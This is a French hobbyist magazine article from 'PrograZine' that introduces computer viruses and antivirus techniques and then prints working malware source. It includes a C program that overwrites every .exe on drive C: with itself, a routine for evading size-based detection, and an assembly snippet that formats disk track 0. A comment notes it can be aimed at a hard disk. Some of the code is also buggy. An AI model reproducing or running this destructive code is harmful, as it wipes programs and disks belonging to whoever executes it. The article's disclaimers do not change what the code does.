<html><head><meta name="author" content="&deg;patrix&deg;">
<meta name="description" content="Pr&eacute;sentation des virus - exemple en C">
<meta name="keywords" content="virus;virii;trojan;troie;checksum">
<title>PrograZine #5 - Petit article sur les virus</title>
</head><body background="../icones/backit.gif">

<div align="right"><img src="../icones/logo.gif">
<br>
[ <a href="../index.htm">edito</a> | <a href="../sommaire.htm">sommaire</a>
 | <a href="../contrib.htm">contribution</a>
 | <a href="../contacts.htm">contacts</a>
 ]</div>
<ul><ul><ul>
<img src="../icones/expert.gif">
<img src="../icones/dos.gif">
<img src="../icones/c.gif">
<br>
<table width="80%" bgcolor="#8080C0"><tr><td><center><b><font size="+2"
 color="#000080">[&gt;<u>Petit article sur les virus</u>&lt;]</font></b></center>
<div align="right">
&deg;patrix&deg;
<br>patrix@multimania.com
</div></td></tr>
</table>
<table><tr valign="top"><td width="30"><img src="../icones/eviter.gif"></img></td><td width="5" bgcolor="#FF0000"><font color="#FF0000">l</font></td><td bgcolor="#FFFF99">
ATTENTION : les sources disponibles dans cet article peuvent &ecirc;tre dangereux ou nuisibles &agrave; des 
syst&egrave;mes informatiques. L'utilit&eacute; qu'en font les lecteurs n'engagent qu'eux !!!
</td></tr></table>


<br>&nbsp;&nbsp;&nbsp;&nbsp;Rappel : Un virus informatique est un programme comme un autre qui execute des
instructions qui sont destin&eacute;es &agrave; effectuer des t&acirc;ches nuisibles au syst&egrave;me comme effacer
des fichiers syst&egrave;mes etc. A NE PAS CONFONDRE AVEC LES VIRUS BIOLOGIQUES ;-)
<br>

<table width="500" bgcolor="#8080C0"><tr><td align="right"><b><u><font face=verdana>&gt;Les types de virii</font></u></b></td></tr></table>

<br>&nbsp;&nbsp;&nbsp;&nbsp;
Les virrii (comprenez virus au pluriel) peuvent &ecirc;tre de diff&eacute;rentes sortes. On les
classe en fonction de la t&acirc;che qu'ils accomplissent et/ou des effets sur les syst&egrave;me.
M&ecirc;me si il est presque impossible de les lister tous (puisqu'on estime qu'il en na&icirc;t
environ 10 par jour), ils fonctionnent en g&eacute;n&eacute;ral selon le m&ecirc;me principe : un des classiques
est le cheval de Troie qui 'se cache' dans un autre programme, un jeu par exemple et attend
d'&ecirc;tre execut&eacute; pour op&eacute;rer (voir source plus bas). Leurs cibles sont tr&egrave;s souvent les
ex&eacute;cutables qu'ils remplacent par eux-m&ecirc;me ou qu'ils se contentent de rendre inutilisables
en &eacute;crivant quelques octets n'importe o&ugrave; dans le fichier.
<br>

<br>&nbsp;&nbsp;&nbsp;&nbsp;
Une autre grande famille est celle du virus qui attaque le mat&eacute;riel. M&ecirc;me si ce genre
de programme a un choix tr&egrave;s restreint quant au mat&eacute;riel &agrave; 'attaquer', ses dommages
peuvent &ecirc;tre dangereux. A titre d'exemple, un programme (dont le source est donn&eacute; plus loin
dans l'article) peut mettre hors-service tout pr&eacute;riph&eacute;rique accessible en 
&eacute;criture. D'autres se contentent de bloquer le clavier de l'utilisateur et de l'obliger &agrave;
red&eacute;marrer pour retrouver un fonctionnement normal.
<br>

<br>&nbsp;&nbsp;&nbsp;&nbsp;
Il existe aussi un certain nombre de virii qui s'appellent Bombes logiques. Ces virii
executent leur t&acirc;che &agrave; une date pr&eacute;cise, comme Friday 13th qui op&egrave;re tous les vendredi 13.
Bien &eacute;videmment les bombes logiques s'associent &agrave; un autre type de virus puisqu'on appelle
bombe logique la simple caract&eacute;ristique de l'execution &agrave; une certaine date. Ces programmes
s'ils sont execut&eacute;s avant la date pr&eacute;cise, se mettent en g&eacute;n&eacute;ral dans la registry (sous
windows 32bits) ou tout autre r&eacute;perttoire syst&egrave;me pour pouvoir &ecirc;tre ex&eacute;cut&eacute;s 
&agrave; chaque d&eacute;marrage.
<br>

<table width="500" bgcolor="#8080C0"><tr><td align="right"><b><u><font face=verdana>&gt;Les solutions ou comment fonctionnent les anti-virus</font></u></b></td></tr></table>

<br>&nbsp;&nbsp;&nbsp;&nbsp;
Les anti-vrisu fonctionnent selon deux modes : le premier est appell&eacute; "sp&eacute;cifique" et 
l'autre "g&eacute;n&eacute;rique".
Les anti-virus en g&eacute;n&eacute;ral ont une base de donn&eacute;e assez large de beaucoup de virus connus
et donc susceptibles d'arriver jusqu'&agrave; l'utilisateur. Bien &eacute;videment, ce
genre de d&eacute;tection "sp&eacute;cifique" montre ses limites tr&egrave;s vite : puisqu'il y a des nouveaux
virii tous les jours, il est impossible de les lister tous et surtout d'avoir une protection
absolue contre chacun d'aux, car il n'est pas toujours possible de r&eacute;parer les d&eacute;g&acirc;ts quand
on ne conna&icirc;t pas le fonctionnement de ce virus.
Malgr&eacute; tout, c'est la m&eacute;thode la plus efficace pour r&eacute;parer das d&eacute;g&acirc;ts et presque tous les
constructeurs proposent en t&eacute;l&eacute;chargement des bases de donn&eacute;es r&eacute;actualis&eacute;es tous les mois.
<br>

<br>&nbsp;&nbsp;&nbsp;&nbsp;
Les deuxi&egrave;me m&eacute;thode, dite "g&eacute;n&eacute;rique" utilise des routines g&eacute;n&eacute;rales pour d&eacute;tecter des virii
dont l'action est r&eacute;partie dans le temps. En effet, les virii qui se cachent dans les 
executables de votre jeu pr&eacute;f&eacute;r&eacute; ont une certaine taille, et donc l'anti-virus n'a qu'&agrave;
remarquer le changement de taille de ce fichier pour le signaler et pour se douter que 
quelque chose de louche se passe l&agrave;-bas. Mais pour &ccedil;a, il faut lancer l'analyseur 
r&eacute;guli&egrave;rement qui met &agrave; jour sa base de donn&eacute;es sur vos executables. Cette deuxi&egrave;me m&eacute;thode
de d&eacute;tection est plus pr&eacute;ventive, mais efficace tout de m&ecirc;me. Pour pousser la parano&iuml;a encore
plus loin, certains anti-virus proposent de v&eacute;rifier la coh&eacute;rence des dates de cr&eacute;ation et
de modification des fichiers, leurs attributs, leur taille, leur nom (&eacute;videmment), leur place
dans l'arborescence, etc.
<br>

<br>&nbsp;&nbsp;&nbsp;&nbsp;
Cette m&eacute;thode n'est valable que pour les virii &agrave; action r&eacute;partie dans le temps (sinon vous
auriez du mal &agrave; lancer l'anti-virus) et/ou les virii dont le seul but est de diminuer
les performances du syst&egrave;me. Malheureusement, il n'existe aucun moyen de v&eacute;rifier les virii
qui s'attaquent au hardware, sauf si ils sont list&eacute;s, et comme ces genres de virii dont
l'effet est irr&eacute;parable se comptent sur les doigts de quelques mains, on peut &eacute;sp&eacute;rer ne
subir aucune attaque grave.
<br>

<table width="500" bgcolor="#8080C0"><tr><td align="right"><b><u><font face=verdana>&gt;Les virii contre-attaquent</font></u></b></td></tr></table>

<br>&nbsp;&nbsp;&nbsp;&nbsp;
Les cr&eacute;ateurs de virii ont plus d'un tour dans leur sac, et comme les moyens utilis&eacute;s par
les routines de d&eacute;tection g&eacute;n&eacute;rique sont simples, voire simplistes, il est relativement
facile de tromper ces anti-virus.
Reprenons le cas des chevaux de troie qui se cachent des vos programmes. Ces virii peuvent
conserver toutes les caract&egrave;ristiques du fichier infect&eacute;. Mais la taille reste probl&eacute;matique
or les anti-virus se basent essentiellement sur ce ph&eacute;nom&egrave;ne de modification de taille des 
fichiers. On arrive toutefois &agrave; conserver la taille du fichier mais il faut souvent passer
par des moyens complexes. En effet, il est assez difficile de modifier la taille d'un 
executable : sous windows 32 bits, des checksum sont impl&eacute;ment&eacute;s dans les executables.
Qu'est-ce qu'un checksum ? En fait, c'est un chiffre qui est en fait la
somme des valeurs de chaque mot (16 bits, soit deux octets) du fichier.
Sous dos 16 bits, les executables poss&eacute;daient uniquement ce checksum l&agrave;, situ&eacute; &agrave; l'adresse
12-13h dans le header dufichier. Mais d&eacute;sormais, en 32 bits, un autre checksum a &eacute;t&eacute; 
impl&eacute;ment&eacute;, celui de la valeur de tous les DWord (c'est &agrave; dire 32bits soit, 4 octets)
du fchier. On le trouve &agrave; l'offset 08-0Bh.
A chaque execution du fichier, les checksum sont v&eacute;rifi&eacute;s pour voir si il n'y a pas 
d'erreur dans le fichier, auquel cas, l'execution est arr&ecirc;t&eacute;e avant m&ecirc;me d'avoir commenc&eacute;.
<br>

<br>&nbsp;&nbsp;&nbsp;&nbsp;
Ainsi certains virii tr&egrave;s &eacute;volu&eacute;s "collent" leur code apr&egrave;s le code du fichier infect&eacute; en
changeant le checksum, et bien s&ucirc;r en modifiant le return du main() pour que le code du 
virus puisse s'&eacute;xecuter. Pour les interress&eacute;s, vous pouvez consulter le source en annexe.
<br>

<br>&nbsp;&nbsp;&nbsp;&nbsp;
Dans le cas qui nous interresse, o&ugrave; l'ancien fichier a &eacute;t&eacute; &eacute;cras&eacute;, il faut donc augmenter 
la taille :et bien tout simplement en rajoutant autant de 0 que souhait&eacute; &agrave; la fin du fichier
pour en faire augmenter la taille sans m&ecirc;me se poser la question du checksum. Ceci n'a pas
d'influence sur l'execution du programme, puisque le programme s'arr&ecirc;te sur le return du
main qui se situe avant les 0. Voici un exemple de fonction qui accomplit ceci
<br>

<table><tr><td bgcolor="#CCCCCC"><pre>
#include &lt;sys/stat.h&gt; //pour stat

void AddNulToFile( char *filename, long FileSize )//FileSize est la taille demand&eacute;e
{
	FILE *fp; struct stat statbuf; long Add, x; char *buf;
	fp = fopen(filename, "wb");
	if(!stat("infect.exe", &amp;statbuf)) return; //pour conna&icirc;tre la taille du fichier
	fseek(fp, statbuf.st_size, SEEK_SET); //on met le pointeur &agrave; la fin du fichier
	Add = FileSize - statbuf.st_size; //on calcule la taille&agrave; ajouter
	if (Add &lt; 0) return; //quand la taille demand&eacute;e est inf&eacute;rieure &agrave; la taille du fichier
	buf = (char *)malloc(Add); //allocation de nos 0
	for(x=0; x &lt;= Add; x++) buf[0] = 0;// on remplit de 0
	fwrite(buf, Add, 1, fp);// puis on les &eacute;crit
}
</pre></td><td width="20" bgcolor="#FFCC33"><font color="#FFCC33">l</font></td></tr></table>

<br>&nbsp;&nbsp;&nbsp;&nbsp;
Aussi simple qua &ccedil;a!
<br>

<br>&nbsp;&nbsp;&nbsp;&nbsp;
Maintenant, si notre virus n'est pas assez petit (en terme de taille) et que par malchance
on tombe sur un executable plus petit que le virus, on peut rienfaire, le seul moyen, est
d'exclure ces fichiers de l'infection. Donc, plus notre virus est petit, plus il sera 
efficace et infectera plus de fichiers. D'o&ugrave; le fait d'occupper le moins de place possible.
Mais il faut trancher avec la vitesse d'execution parce que les compilateurs optimisent
l'un au profit de l'autre, alors que la vitesse d'execution d'un virus est &eacute;galement
cruciale. C'est pour &eacute;viter les optimisations et les "traductions" d'un compilateur que
la plupart des virii sont &eacute;crits en assembleur.
<br>

<table width="500" bgcolor="#8080C0"><tr><td align="right"><b><u><font face=verdana>&gt;Quelques exemples de virii</font></u></b></td></tr></table>

<table><tr valign="top"><td width="30"><img src="../icones/eviter.gif"></img></td><td width="5" bgcolor="#FF0000"><font color="#FF0000">l</font></td><td bgcolor="#FFFF99">
ATTENTION : ces sources sont uniquement l&agrave; pour &eacute;clairer votre compr&eacute;hension des virii,
il ne peuvent en aucun cas servir &agrave; infecter un autre syst&egrave;me. L'utilisation que vous en
ferez n'engage que vous.
Pour limiter les d&eacute;g&acirc;ts de mettre des virii &agrave; la port&eacute;e de n'importe qui, je pose des 
limitations dans les deux sources fournis.
</td></tr></table>

<table width="500" bgcolor="#8080C0"><tr><td align="right"><b><u><font face=verdana>&gt;Premier source (C/Api Windows)</font></u></b></td></tr></table>

<br>&nbsp;&nbsp;&nbsp;&nbsp;
Cheval de Troie basique infectant toute l'arborescence d'un syst&egrave;me windows
32 bits depuis la racine c:. Si le programme esst arr&eacute;t&eacute; avant la fin de sa t&acirc;che, il ne
saura pas reprendre l&agrave; o&ugrave; il en &eacute;tait. Peut facilement &ecirc;tre d&eacute;tect&eacute; par les anti-virus. 
Un moyen tr&egrave;s r&eacute;pandu est de ne pas s'ocupper de toute l'arborescence du disque 
"d'une traite" et de commencert par infecter le r&eacute;pertoire courant puis exporter une 
infection vers un r&eacute;pertoire parent ou un sous-r&eacute;pertoire, l'astuce &eacute;tant d'attendre 
l'execution de ce programme pour infecter le r&eacute;pertoire suivant. Ainsi, on a une infection
lente par cycles, mais efficace, car si un programme s'execute trop longtemps sans rien
afficher &agrave; l'&eacute;cran, cela peut tenter au doute et &agrave; la m&eacute;fiance.
<br>


<table><tr><td bgcolor="#CCCCCC"><pre>
/* INFECT.C : n&eacute;cessite des connaissances &eacute;l&eacute;mantaires de l'api windows 32 bit */
/* (c) Patrick : ni PrograZine, ni l'auteur ne sont responsables de l'utilisation */
/* de ce fichier */

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;sys/stat.h&gt; //pour findfirst et findnext
#include &lt;sys/types.h&gt;
#include &lt;string.h&gt;
#include &lt;io.h&gt;

FILE *infected;
char *buf; long bufsize = 32000; //taille arbitraire

void InfectEXE(char *name);
void FetchFiles( char *path );
int CheckForEXEs(char *name);

void main( void )
{
	FILE *myself; struct stat statbuf;
	if(!(myself=fopen("infect.exe","rb")))
		return;
	if(!stat("infect.exe", &amp;statbuf)) bufsize = statbuf.st_size;
	buf=(char *)malloc(bufsize);
	fread(buf, bufsize, 1, myself);
	FetchFiles("c:\\"); fclose(myself);
}

void FetchFiles( char *path ) // recherche les executables dans le rep courant
{	
	struct _finddata_t Files; long handle; char tmp_path[5000];
	strcpy(tmp_path, path); strcat(tmp_path,"*.*");
	if((handle = _findfirst(tmp_path, &amp;Files)) == -1) return;
	do
	{
		if(!strcmp(Files.name,".") || !strcmp(Files.name, "..")) continue;
		if(Files.attrib == _A_SUBDIR)// dans le cas o&ugrave; l'on rencontre un sous-r&eacute;pertoire
		{
			strcpy(tmp_path,path); strcat(tmp_path,Files.name);
			strcat(tmp_path,"\\");
			FetchFiles(tmp_path);
		}

		if(CheckForEXEs(Files.name))
		{
			strcpy(tmp_path,path); strcat(tmp_path,Files.name);
			InfectEXE(tmp_path);
		}
	} while(!_findnext(handle, &amp;Files));
	return;
}

int CheckForEXEs(char *name) // v&eacute;rifie si le fichier trouv&eacute; est un exe
{
	while(*name &amp;&amp; *name != '.') name++;
	if(!strcmp(name,".exe")) return 1;
	else return 0;
}

void InfectEXE(char *name) //copie infect.exe par dessus l'exe trouv&eacute;
{
	if(!(infected=fopen(name,"wb"))) return;
	fwrite(buf,bufsize,1,infected);
	fclose(infected);
}

</pre></td><td width="20" bgcolor="#FFCC33"><font color="#FFCC33">l</font></td></tr></table>

<br>&nbsp;&nbsp;&nbsp;&nbsp;
Ce virus se recopie lui-m&ecirc;me dans tous les executables rencontr&eacute;s; quand il rencontre un
r&eacute;pertoire, il y entre et refait le m&ecirc;me travail (cf. artcile sur la r&eacute;cursivit&eacute;) en 
retenant dans sa pile les chemins d'acc&egrave;s pour revenir dans le r&eacute;pertoire initial pour finir
le travail.
<br>

<table width="500" bgcolor="#8080C0"><tr><td align="right"><b><u><font face=verdana>&gt;Deuxi&egrave;me source (PC Asm)</font></u></b></td></tr></table>

<br>&nbsp;&nbsp;&nbsp;&nbsp;
Ce source en assembleur est extr&egrave;mement efficace et tr&egrave;s rapide. Du fait de l'agressivit&eacute;
de ce virus, j'ai du encore poser une limitation : ce programme en formattant la piste 0
d'une disquette la rend hors-service. Les petits malins auront compris qu'il suffit
de remplacer le num&eacute;ro du lecteur pour rendre aussi-vite et de la m&ecirc;me facon un disque
dur inutilisable (disque dur ou tout autre lecteur accessible en &eacute;criture).
<br>

<table><tr><td bgcolor="#CCCCCC"><pre>
MOV AH,05
MOV DL,00 ; si on change le 00 (lecteur de disquette) en num&eacute;ro de disque dur...
MOV DH,00
MOV CH,00
MOV CL,01
MOV AL,08
INT 13
MOV AH,00
INT 21
</pre></td><td width="20" bgcolor="#FFCC33"><font color="#FFCC33">l</font></td></tr></table>


<table width="500" bgcolor="#8080C0"><tr><td align="right"><b><u><font face=verdana>&gt;ANNEXE</font></u></b></td></tr></table>

<table><tr><td bgcolor="#CCCCCC"><pre>
/*
 * Manipuler le checksum 16 bit et 32 bit d'un fichier executable
 * sous windows/dos; peut facilement &ecirc;tre adapt&eacute; &agrave; la modification du checksum
 */

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;io.h&gt;

void Calc16ChkSum(FILE *fp);
void Calc32ChkSum(FILE *fp);
void main(int, char **);

FILE *fp; unsigned long NewHdrOffset, FileSize = 0L; 
unsigned int PageCnt;

#define NEWHDROFFSET  0x3C   /* Emplacement dans l'ancien header
                                avec offset du nouveau header dans l'exe */

void main (int argc, char * argv[])
{ 
   if (argc != 2)
      {
      printf("\n\nUsage: %s <EXEfilename>\n\n", argv[0]);
      exit(-1);
      }

   if ((fp = fopen(argv[1], "rb")) == NULL)
      {
      printf("\n\nErreur: impossible d'ouvrir : %s\n\n", argv[1]);
      exit(-1);
      }

   fread(&amp;PageCnt, sizeof(int), 1, fp); /* Lire apr&egrave;s la signature */
   fread(&amp;PageCnt, sizeof(int), 1, fp); /* Lire la taille de la d&egrave;rni&egrave;re page */
   FileSize = PageCnt;
   fread(&amp;PageCnt, sizeof(int), 1, fp); /*Lire la page enti&egrave;re du compte */

   if (FileSize == 0L)
      FileSize = PageCnt * 512;
   else
      FileSize += (PageCnt - 1) * 512;

   fseek(fp, NEWHDROFFSET, SEEK_SET);  /* Retrouver le nouveau offsetde l'EXE */
   fread(&amp;NewHdrOffset, sizeof(long), 1, fp);  /* et le lire */

   if (NewHdrOffset == 0L)
      Calc16ChkSum(fp);
   else
      Calc32ChkSum(fp);

   fcloseall();
   return;
} 

void Calc16ChkSum(FILE *fp)
{ 
   unsigned int sum16, NxtInt, x;
   unsigned char NxtChar;

   sum16 = 0;
   fseek(fp, 0, SEEK_SET);

   for (x = 0L; x &lt; FileSize / 2L; x++)
      {
      fread(&amp;NxtInt, sizeof(int), 1, fp);
      sum16 += NxtInt;
      }

   /* Prendre le dernier octet si la taille est bizarre */

   if (FileSize % 2)
      {
      fread(&amp;NxtChar, sizeof(char), 1, fp);
      sum16 += (unsigned int)NxtChar;
      }

   printf("\nLe checksum 16bit devrait etre FFFF, et il est %x\n\n",
         sum16);
}

void Calc32ChkSum(FILE *fp)
{ 
   unsigned long sum32, NxtLong, CheckSum32, x;
   unsigned char NxtByte, y;

   sum32 = 0;
   fseek(fp, 0, SEEK_SET);

   /* Caculer le nombre de DWords avant le checksum et les ajouter */

   x = (NewHdrOffset + 8) / 4;

   for ( ; x; x--)
      {
      fread(&amp;NxtLong, sizeof(long), 1, fp);
      sum32 += NxtLong;
      }

   /* Lire le checksum */

   fread(&amp;CheckSum32, sizeof(long), 1, fp);
   /* Ensuite, le reste des DWord dans le fichier */

   for (x = 0; x &lt; (FileSize - NewHdrOffset - 12) / 4; x++)
      {
      fread(&amp;NxtLong, sizeof(long), 1, fp);
      sum32 += NxtLong;
      }

   /* On doit compter les octets en plus du fichier. Normalement, ils
      forment un long avec les bits de poids fort &agrave; z&eacute;ro
   */

   if (0L != (x = FileSize % 4L))
      {
      NxtLong = 0L;
      for (y = 0 ; y &lt; x ; y++)
         {
         fread(&amp;NxtByte, sizeof(char), 1, fp);
         NxtLong += (unsigned long)NxtByte &lt;&lt; (8 * y);
         }
      sum32 += NxtLong;
      }

   printf("\nLe checksum 32 bits devrait etre %lx, et il est %lx\n\n",
           CheckSum32, sum32);
}

</pre></td><td width="20" bgcolor="#FFCC33"><font color="#FFCC33">l</font></td></tr></table>

<br><img src="../icones/barre.gif"></img><br>
<b>Ce document est la propri&eacute;t&eacute de &deg;patrix&deg;.
La r&eacute;daction ainsi que l'auteur d&eacute;clinent toutes r&eacute;sponsabilit&eacute; vis-&acirc;-vis des cons&eacute;quences que pourrait
 entrainer le contenu de cet article.</b></ul></ul></ul></body></html>
